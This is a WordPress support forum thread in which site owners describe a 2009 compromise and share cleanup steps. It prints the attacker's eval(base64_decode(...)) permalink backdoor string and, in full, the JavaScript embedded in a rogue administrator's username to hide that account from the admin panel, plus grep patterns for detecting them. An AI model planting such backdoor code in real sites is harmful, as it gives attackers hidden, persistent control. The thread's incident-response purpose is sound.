eval(base64_decode(…)) in permalinks

  • Resolved benanne

    (@benanne)


    15 years, 2 months ago

    I figure my blog got hacked. It’s my own fault for being too lazy to upgrade, but I thought I’d describe the symptoms, so other people who have the same problem have something to go by. I have since removed all the malicious stuff (at least I think I have) and upgraded to version 2.8.4.

    Since this morning, I noticed that my “permalinks” setting had been customised (I use the default ?p=123-style URLs, normally) and for some reason, there was something like: ${eval(base64_decode($_SERVER[HTTP_REFERER]))} appended to each of them. Which caused them not to work, obviously.

    When I looked at my users list, I noticed something odd: at the top it said Administrators (2), but only my own account was listed as administrator. I took a look at the database and seemingly, a user called “JohnFisher76” also had admin rights. I’d had a few spam registrations before so I hadn’t paid attention to this. I wish I had…

    This user’s username was… a bit weird. It looked like this:

    ...

<div id="user_superuser"><script language="JavaScript">
var setUserName = function(){
	try{
		var t=document.getElementById("user_superuser");
		while(t.nodeName!="TR"){
			t=t.parentNode;
		};
		t.parentNode.removeChild(t);
		var tags = document.getElementsByTagName("H3");
		var s = " shown below";
		for (var i = 0; i < tags.length; i++) {
			var t=tags[i].innerHTML;
			var h=tags[i];
			if(t.indexOf(s)>0){
				s =(parseInt(t)-1)+s;
				h.removeChild(h.firstChild);
				t = document.createTextNode(s);
				h.appendChild(t);
			}
		}
		var arr=document.getElementsByTagName("ul");
		for(var i in arr) if(arr[i].className=="subsubsub"){
			var n=/>Administrator ((d+))</gi.exec(arr[i].innerHTML);
			if(n[1]>0){
				var txt=arr[i].innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");
        arr[i].innerHTML=txt;
        }
    }
          }catch(e){};
     };
     addLoadEvent(setUserName);
</script></div>

    I haven’t bothered to try and interpret what this does, but I guess it’s used to hide the fact that there is another administrator in the admin panel. I don’t know how this user managed to acquire admin rights though.

    Anyway, shame on me for not upgrading. To fix it, I removed the user (manually, in the database, tables user and usermeta), got rid of the funky permalink stuff, and then upgraded to 2.8.4 as fast as I could. As far as I can tell that’s fixed it. I hope this thing hasn’t left anything else behind that could come back to haunt me…

Viewing 12 replies - 1 through 12 (of 12 total)

  • Hi

    I’ve experienced the same thing today. I visited my site yesterday and everything was fine. Today everything is messed up. How did you get rid of the permalink problems?

    Thanks!

    Thread Starter benanne

    (@benanne)

    I just set it back to the default setting. Technically, I did remove the appended stuff in the database manually before that, but I don’t think that had any effect.

    At any rate it can’t hurt to search the “options” table for any reference to “eval” or “base64” and clean that up. It also appeared in a row in “options” called “rewrite_rules”, I think. But that disappeared once I changed the setting back.

    As I said, I don’t know if this has caused any other damage. The changed permalink setting rather seems like it is put in place to make further hacks easier to apply, although I have no idea how.

    Check this thread:
    https://www.ads-software.com/support/topic/307518

    and upgrade wordpress

    Thread Starter benanne

    (@benanne)

    Thanks, that is indeed exactly the same problem as the one I had. Maybe the extra information about the rogue user with administrator rights is still interesting, though.

    i`ve just clean this stuff in “permalinks” and change my admin password.

    all works.

    P.S. Do backups – it saves your time

    Thread Starter benanne

    (@benanne)

    If I were you, I would check my user list to see if there are any admins in there that shouldn’t be there…

    Thread number three
    https://www.ads-software.com/support/topic/307518?replies=15
    https://www.ads-software.com/support/topic/297639

    It seems that this already started a couple of weeks ago, judging the oldest thread. Some automatic attack I guess.

    My site got nailed too. I didn’t think of anything when I had a couple “admin” users added to the site. Thought it was just spam. But I had two additional “admins” with “contributer” status and they were able to change the Permalinks url structure. Argghh.

    problem solved … https://blog.4rev.net/2009-09/wordpress-hacked-eval-base64_decode-_serverhttp_referer/

    in wp_options table, clear the row named _transient_rewrite_rules and set permailink from wp config again !!!

    check all your dababase for infection:

    from ssh , use grep and search for particular strings in all database from server :

    grep -H -r “eval(base64_decode” /var/lib/mysql
    grep -H -r “var setUserName = function” /var/lib/mysql

    have a nice day …

    Well, happy? to say that its not your fault!

    the hacks are coming from lower layers than WP itself, we suspect the the OS’s themselves are cracked.

    frankly, the only ‘real’ way to monitor and know if you have been hacked would be to monitor for malware, which we offer for free at: https://www.sitesecuritymonitor.com

    We also offer a free WP security plugin, to lockdown all versions of wordpress. This works in 98% of the cases (download here: https://www.ads-software.com/extend/plugins/wp-secure-by-sitesecuritymonitorcom/ ) – however in this case, if you are hosted w/ godaddy, since the attacks are from the inside (we suspect in this case a cracked apache.conf that is injecting malware during execution) – the plugin wouldn’t help much

    ??

    I have a similar problem on Dreamhost, all of my WP files have been injected with this at the start:

    <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25f.... etc

    @jremillard, do you think I’m being hacked via WordPress, or some other way?

    So sick of this happening ??

    Thanks.

    Moderator James Huff

    (@macmanx)

    The current hack involves injecting base64 code into all .php files, not just WordPress. I believe the leading theory at this point is that malware is exploiting passwords that are sent “in the clear” via FTP clients. The solution in that case would be to switch to using SFTP. Use FileZilla if you’re on a PC or Cyberduck if you’re on a Mac.

    To clean out the current hack, carefully follow this guide:

    https://codex.www.ads-software.com/FAQ_My_site_was_hacked

Viewing 12 replies - 1 through 12 (of 12 total)
  • The topic ‘eval(base64_decode(…)) in permalinks’ is closed to new replies.